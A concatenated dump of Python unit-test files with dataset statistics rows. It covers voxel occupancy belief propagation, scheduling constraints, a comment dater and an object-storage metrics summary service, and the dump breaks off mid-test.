ray_voxel_count = []
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[0, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S1 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0, 0.0]],
dtype=np.float32
)
S_total[0, :] = S1
ray_start = np.array([6., 5.5, 0.5], dtype=np.float32)
ray_end = np.array([0.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[1, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S2 = np.array(
[[0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.07]],
dtype=np.float32
)
S_total[1, :] = S2
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 11, batch_size=2)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 11)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
for i in range(6):
for j in range(6):
self.assertGreaterEqual(occupancy_probabilities[0, 2, 2], occupancy_probabilities[0, i, j])
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_2rays_2.png" % (i,))
plt.close()
def test_2d_single_3rays(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((3, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((3, 11), dtype=np.float32)
ray_voxel_count = []
# Ray 1
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[0, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S1 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0, 0.0]],
dtype=np.float32
)
S_total[0, :] = S1
# Ray 2
ray_start = np.array([0.0, 2.5, 0.5], dtype=np.float32)
ray_end = np.array([6.0, 2.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[1, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S2 = np.array(
[[0.45, 0.0875, 0.2, 0.0875, 0.0875, 0.0875, 0.0, 0.0, 0.0, 0.0, 0.0]],
dtype=np.float32
)
S_total[1, :] = S2
# Ray 3
ray_start = np.array([6., 5.5, 0.5], dtype=np.float32)
ray_end = np.array([0.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[2, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S3 = np.array(
[[0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.185, 0.07, 0.07, 0.07, 0.07]],
dtype=np.float32
)
S_total[2, :] = S3
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 3, 11, batch_size=3)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((3, 11)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
# Make sure that the voxel, for which all rays vote there is a higher
# probability
for i in range(6):
for j in range(6):
self.assertGreaterEqual(
occupancy_probabilities[0, 2, 2],
occupancy_probabilities[0, i, j]
)
for i in range(6):
for j in range(6):
if i == 2 and j == 2:
continue
self.assertGreaterEqual(
occupancy_probabilities[0, 2, 0],
occupancy_probabilities[0, i, j]
)
for i in range(6):
for j in range(6):
if i == 2 and (j == 2 or j==0):
continue
self.assertGreaterEqual(
occupancy_probabilities[0, 4, 4],
occupancy_probabilities[0, i, j]
)
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_3rays.png" % (i,))
plt.close()
def test_2d_conflict(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 11), dtype=np.float32)
ray_voxel_count = []
# Ray 1
ray_start = np.array([0.0, 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[0, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S_total[0, 2] = 0.5
S_total[0, 6] = 0.5
# Ray 2
ray_start = np.array([0.0, 1.5, 0.5], dtype=np.float32)
ray_end = np.array([4.5, 6.0, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[1, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
S_total[1, 4] = 1.0
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 11, batch_size=2)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 11)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
self.assertTrue(occupancy_probabilities[0, 0, 2] < 0.1)
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_conflict.png" % (i,))
plt.close()
def test_depth_distribution(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 11), dtype=np.float32)
ray_voxel_count = []
# Ray 1
ray_start = np.array([0.0, 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6.0, 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[0, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
S_total[0, 2] = 0.5
S_total[0, 6] = 0.5
# Ray 2
ray_start = np.array([0.0, 1.5, 0.5], dtype=np.float32)
ray_end = np.array([4.5, 6.0, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[1, :, :],
ray_start, ray_end
)
ray_voxel_count.append(Nr)
S_total[1, 4] = 1.0
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 11)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon =\
bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 11)).astype(np.float32)
)
S_new = bp.estimate_depth_probabilities_from_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
ray_to_occupancy_accumulated_pon,
ray_to_occupancy_messages_pon,
np.zeros_like(S_total)
)
if isinstance(S_new, list):
S_new = S_new[0]
self.assertGreater(0.5, S_new[0, 2])
self.assertLess(0.9, S_new[0, 6])
self.assertLess(0.9, S_new[1, 4])
if __name__ == "__main__":
unittest.main()
| 38.228029 | 128 | 0.554989 | 2,229 | 16,094 | 3.798116 | 0.078959 | 0.046303 | 0.071108 | 0.028349 | 0.860265 | 0.830617 | 0.811009 | 0.791755 | 0.787503 | 0.771911 | 0 | 0.08131 | 0.324469 | 16,094 | 420 | 129 | 38.319048 | 0.697388 | 0.066298 | 0 | 0.668657 | 0 | 0 | 0.015408 | 0.013941 | 0 | 0 | 0 | 0 | 0.032836 | 1 | 0.023881 | false | 0 | 0.023881 | 0.002985 | 0.056716 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b1732832ed81e62d59805322219f19b4edea9227 | 84 | py | Python | tests/test_chapter4_hello.py | paiml/testing-in-python | d670b97c0377f4deaf3ddf9acf7f86be281c95e3 | [
"MIT"
] | 7 | 2020-02-24T14:59:00.000Z | 2022-02-22T19:17:42.000Z | tests/test_chapter4_hello.py | paiml/testing-in-python | d670b97c0377f4deaf3ddf9acf7f86be281c95e3 | [
"MIT"
] | 1 | 2020-02-16T18:15:12.000Z | 2020-03-04T22:57:28.000Z | tests/test_chapter4_hello.py | paiml/testing-in-python | d670b97c0377f4deaf3ddf9acf7f86be281c95e3 | [
"MIT"
] | 4 | 2020-12-25T22:52:22.000Z | 2022-01-23T03:53:28.000Z | from chapter4 import hello
def test_hello_toyou():
assert hello.toyou() == "hi" | 21 | 32 | 0.714286 | 12 | 84 | 4.833333 | 0.75 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 0.166667 | 84 | 4 | 32 | 21 | 0.814286 | 0 | 0 | 0 | 0 | 0 | 0.023529 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b176e555bf32ec63b806ec28a7f25a87503710f9 | 2,096 | py | Python | commentdater/test.py | lsingh123/commentdater | 36f4d5ada9be83c55b7a9b24454776f9c594cbe2 | [
"MIT"
] | null | null | null | commentdater/test.py | lsingh123/commentdater | 36f4d5ada9be83c55b7a9b24454776f9c594cbe2 | [
"MIT"
] | null | null | null | commentdater/test.py | lsingh123/commentdater | 36f4d5ada9be83c55b7a9b24454776f9c594cbe2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 25 12:25:15 2019
@author: lavanyasingh
"""
import unittest
import os
import importlib
import src
importlib.reload(src)
class Tester(unittest.TestCase):
def test_py(self):
with open("test_data/test_output.txt", "w") as fd:
dater = src.CommentDater("test_data/test_infile.py", output = fd)
dater.parse()
with open("test_data/test_output.txt", "r") as fd:
output = "".join(list(fd.readlines()))
# check outdated single line comment (file modified line 11)
self.assertNotEqual(output.find("possible outdated comment at test/test_infile.py:9"), -1)
# check that modified comments aren't included in output
# (file modified at line 13 and line 14)
self.assertEqual(output.find("possible outdated comment at test/test_infile.py:13"), -1)
# check that multiline comments are handled (file modified at line 19)
self.assertNotEqual(output.find("possible outdated comment at test/test_infile.py:16"), -1)
def test_c(self):
with open("test_data/test_output.txt", "w") as fd:
dater = src.CommentDater("test_data/test_infile.cc", output = fd)
dater.parse()
with open("test_data/test_output.txt", "r") as fd:
output = "".join(list(fd.readlines()))
# check outdated single line comment (file modified line 3)
self.assertNotEqual(output.find("possible outdated comment at test/test_infile.cc:1"), -1)
# check that modified comments aren't included in output
# (file modified at line 6 and line 7)
self.assertEqual(output.find("possible outdated comment at test/test_infile.cc:6"), -1)
# check that multiline comments are handled (file modified at line 12)
self.assertNotEqual(output.find("possible outdated comment at test/test_infile.cc:9"), -1)
if __name__ == '__main__':
unittest.main()
os.remove("test_data/test_output.txt") | 38.814815 | 99 | 0.642653 | 285 | 2,096 | 4.621053 | 0.294737 | 0.060744 | 0.063781 | 0.118451 | 0.810175 | 0.794229 | 0.794229 | 0.794229 | 0.794229 | 0.794229 | 0 | 0.025835 | 0.242844 | 2,096 | 54 | 100 | 38.814815 | 0.804033 | 0.260019 | 0 | 0.296296 | 0 | 0 | 0.317264 | 0.196091 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.074074 | false | 0 | 0.185185 | 0 | 0.296296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4930e0a4be4772bcd6fe7237a8ab9657447ea050 | 96 | py | Python | venv/lib/python3.8/site-packages/pip/_internal/commands/completion.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pip/_internal/commands/completion.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pip/_internal/commands/completion.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/53/14/b4/f6cf2b127534f000223778077502235385c64a5bf9489deb209753ca10 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.510417 | 0 | 96 | 1 | 96 | 96 | 0.385417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49756a2848cd575f371ecf656bb8c5e98f2823b8 | 3,528 | py | Python | tests/test_constraints.py | anthonydugois/dstf | a08bfc8927910e104234e4189113c40029cf96c0 | [
"MIT"
] | null | null | null | tests/test_constraints.py | anthonydugois/dstf | a08bfc8927910e104234e4189113c40029cf96c0 | [
"MIT"
] | null | null | null | tests/test_constraints.py | anthonydugois/dstf | a08bfc8927910e104234e4189113c40029cf96c0 | [
"MIT"
] | null | null | null | from dstf import *
def test_isvalid__no_simultaneous_execution():
task = Task("t0")
node = "n0"
sched = Schedule()
sched.apply(AppendOperator(Chunk(task, 10, {node: 10})))
ctr = NoSimultaneousExecutionConstraint()
assert ctr.isvalid(sched, Chunk(task, 20, {node: 10}))
assert ctr.isvalid(sched, Chunk(task, 0, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 15, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 5, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 10, {node: 10}))
def test_isvalid__no_migration():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(3)]
sched = Schedule()
sched.apply(AppendOperator(Chunk(task, 0, {nodes[0]: 10})))
ctr = NoMigrationConstraint()
assert ctr.isvalid(sched, Chunk(task, 10, {nodes[0]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 10, {nodes[1]: 10}))
def test_isvalid__processing_times():
task = Task("t0")
node = "n0"
sched = Schedule()
sched.apply(AppendOperator(Chunk(task, 0, {node: 5})))
ctr = ProcessingTimesConstraint({node: 10})
assert ctr.isvalid(sched, Chunk(task, 5, {node: 5.000001}))
assert ctr.isvalid(sched, Chunk(task, 5, {node: 2}))
assert not ctr.isvalid(sched, Chunk(task, 5, {node: 5.001}))
assert not ctr.isvalid(sched, Chunk(task, 5, {node: 6}))
def test_isvalid__release_time():
task = Task("t0")
node = "n0"
sched = Schedule()
ctr = ReleaseTimeConstraint(10)
assert ctr.isvalid(sched, Chunk(task, 10, {node: 10}))
assert ctr.isvalid(sched, Chunk(task, 11, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 9, {node: 10}))
def test_isvalid__deadline():
task = Task("t0")
node = "n0"
sched = Schedule()
ctr = DeadlineConstraint(10)
assert ctr.isvalid(sched, Chunk(task, 0, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 1, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {node: 11}))
def test_isvalid__multipurpose_machines():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(10)]
sched = Schedule()
ctr = MultipurposeMachinesConstraint(nodes[:3])
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10}))
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[3]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[3]: 10}))
def test_isvalid__execution_size():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(10)]
sched = Schedule()
ctr = ExecutionSizeConstraint(2)
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10}))
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[3]: 10, nodes[4]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10}))
def test_isvalid__execution_nodes():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(10)]
sched = Schedule()
ctr = ExecutionNodesConstraint(nodes[:3])
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10, nodes[3]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[3]: 10}))
| 32.366972 | 107 | 0.63407 | 518 | 3,528 | 4.256757 | 0.1139 | 0.130612 | 0.197279 | 0.263039 | 0.814966 | 0.775057 | 0.757823 | 0.735601 | 0.61678 | 0.493878 | 0 | 0.069338 | 0.186508 | 3,528 | 108 | 108 | 32.666667 | 0.698955 | 0 | 0 | 0.39726 | 0 | 0 | 0.010204 | 0 | 0 | 0 | 0 | 0 | 0.39726 | 1 | 0.109589 | false | 0 | 0.013699 | 0 | 0.123288 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
498629b32fad75b1a1d8c62bcbb3cf7f40209d9c | 31,643 | py | Python | tests/plugins/test_objectstorage_summary_service.py | papodaca/opsconsole-server | 952e5765cd22bf7cf364d89bf5cce14440ddc575 | [
"Apache-2.0"
] | null | null | null | tests/plugins/test_objectstorage_summary_service.py | papodaca/opsconsole-server | 952e5765cd22bf7cf364d89bf5cce14440ddc575 | [
"Apache-2.0"
] | null | null | null | tests/plugins/test_objectstorage_summary_service.py | papodaca/opsconsole-server | 952e5765cd22bf7cf364d89bf5cce14440ddc575 | [
"Apache-2.0"
] | null | null | null | # (c) Copyright 2016-2017 Hewlett Packard Enterprise Development LP
# (c) Copyright 2017 SUSE LLC
from mock import patch
from bll import api
from bll.api.auth_token import TokenHelpers
from bll.api.request import BllRequest
from bll.plugins import objectstorage_summary_service
from monascaclient.v2_0.alarms import AlarmsManager
from monascaclient.v2_0.metrics import MetricsManager
from monascaclient.v2_0.alarm_definitions import AlarmDefinitionsManager
from tests.util import TestCase
MEASUREMENT_OUPUT = [{'dimensions':
{'service': 'ops-console',
'cluster': 'management',
'url': 'http://192.16.66.10:9095/version.json',
'hostname': 'mycloud-ccp-mgmt-m1-clm',
'component': 'ops-console-web',
'control_plane': 'ccp',
'mount': '/dev/mqueue',
'cloud_name': 'mycloud'
},
'measurements': [['2016-08-28T22:41:15.000Z', 12.0, {}],
['2016-08-28T23:41:15.000Z', 59.0, {}]
],
'id': '3a155502224c8e83b30ee13e2adfe9d89d78e602',
'columns': ['timestamp', 'value', 'value_meta'],
'name': 'test'}]
STATISTICS_OUTPUT = [{'dimensions':
{'service': 'object-storage',
'cluster': 'MyCluster',
'hostname': 'MyHostname',
'mount': '/dev/mqueue'
},
'name': 'Swiftlm.Test',
'statistics': [
['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T23:41:15.000Z', 2.0]]
}
]
SPECIAL_STATISTICS_OUTPUT = [{'dimensions':
{'service': 'object-storage',
'cluster': 'MyCluster',
'hostname': 'MyHostname',
'mount': '/dev/mqueue'
},
'name': 'Swiftlm.Test',
'statistics': [
['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T04:41:15.000Z', 2.0],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T15:41:15.000Z', 0.0],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T23:41:15.000Z', 2.0]]
}
]
ALARM_DEFINITION_SHOW_OUTPUT = {'description': 'Alarms',
'id': '38b3c2b7-efe6',
'name': 'Disk Usage',
'severity': 'LOW'
}
ALARM_LIST_OUTPUT = [{'state': 'OK',
'alarm_definition': {'severity': 'LOW',
'id': '38b3c2b7-efe6',
'name': 'Disk Usage'},
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c713'},
{'state': 'ALARM',
'alarm_definition': {'severity': 'LOW',
'id': '38b3c2b7-efe7',
'name': 'Memory Usage'},
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c714'},
{'state': 'ALARM',
'alarm_definition': {'severity': 'HIGH',
'id': '38b3c2b7-efe8',
'name': 'Latency Usage'},
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c715'}
]
ALARM_SHOW_OUTPUT = {'state': "ALARM",
'alarm_definition': {'severity': 'HIGH',
'id': '38b3c2b7-efe8',
'name': 'Latency Usage'},
'status': 'CRITICAL',
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c715'
}
CALL_SERVICE_OUTPUT = {'ccp:cluster1':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt'],
'ccp:cluster2':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt']}
ALARM_COUNT_OUTPUT = {"counts":
[[5, "OK", "LOW"],
[6, "ALARM", "CRITICAL"],
[2, "ALARM", "HIGH"],
[3, "ALARM", "LOW"],
[7, "UNDETERMINED", "MED"]]}
METRIC_LIST_OUTPUT = [{"id": "0000f6b224259cf215505608edf6f10d7a3a273d",
"name": "swiftlm.systems.check_mounts",
"dimensions": {"cluster": "MyCluster",
"hostname": "Myhostname",
"service": "object-storage",
"mount": "/dev/mqueue"}
}]
class Object_Storage_Data():
def data_without_cluster_card(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '1',
'period': '3600'}
def data_without_cluster_graph(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '5',
'period': '3600'}
def data_with_cluster_card(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '1',
'period': '3600',
'cluster': 'MyCluster',
'hostname': 'MyHostname'}
def data_with_cluster_graph(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '5',
'period': '3600',
'cluster': 'MyCluster',
'hostname': 'Myhostname'}
def data_only_node(self):
return {'cluster': 'MyCluster',
'hostname': 'Myhostname'}
class TestObjectStorageSummarySvc(TestCase):
def setUp(self):
self.inst = Object_Storage_Data()
def test_memory_card(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='memory',
data=data,
expected_output=expected_output)
def test_storage_card(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='storage',
data=data,
expected_output=expected_output)
def test_load_average_donut(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='load_average_donut',
data=data,
expected_output=expected_output)
def test_time_to_replicate_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='time_to_replicate',
data=data,
expected_output=expected_output)
def test_time_to_replicate_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='time_to_replicate',
data=data,
expected_output=expected_output)
def test_oldest_replication_completion_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(
operation='oldest_replication_completion',
data=data,
expected_output=expected_output)
def test_oldest_replication_completion_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(
operation='oldest_replication_completion',
data=data,
expected_output=expected_output)
def test_current_capacity_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='current_capacity',
data=data,
expected_output=expected_output)
def test_current_capacity_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test':
[['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]]}
self.common_handler(operation='current_capacity',
data=data,
expected_output=expected_output)
def test_filesystem_utilization_card(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='filesystem_utilization',
data=data,
expected_output=expected_output)
def test_latency_healthcheck_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='latency_healthcheck',
data=data,
expected_output=expected_output)
def test_latency_healthcheck_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='latency_healthcheck',
data=data,
expected_output=expected_output)
def test_latency_operational_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='latency_operational',
data=data,
expected_output=expected_output)
def test_latency_operational_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='latency_operational',
data=data,
expected_output=expected_output)
def test_async_pending_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='async_pending',
data=data,
expected_output=expected_output)
def test_async_pending_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='async_pending',
data=data,
expected_output=expected_output)
def test_alarms(self):
data = self.inst.data_without_cluster_card()
expected_output = {'counts': [[5, 'OK', 'LOW'],
[6, 'ALARM', 'CRITICAL'],
[2, 'ALARM', 'HIGH'],
[3, 'ALARM', 'LOW'],
[7, 'UNDETERMINED', 'MED']
]}
self.common_handler(operation='alarms',
data=data,
expected_output=expected_output)
def test_mount_status(self):
data = self.inst.data_with_cluster_card()
expected_output = {'total_mount_point': 1,
'mount_status': {'mounted': 0,
'unmounted': 1}}
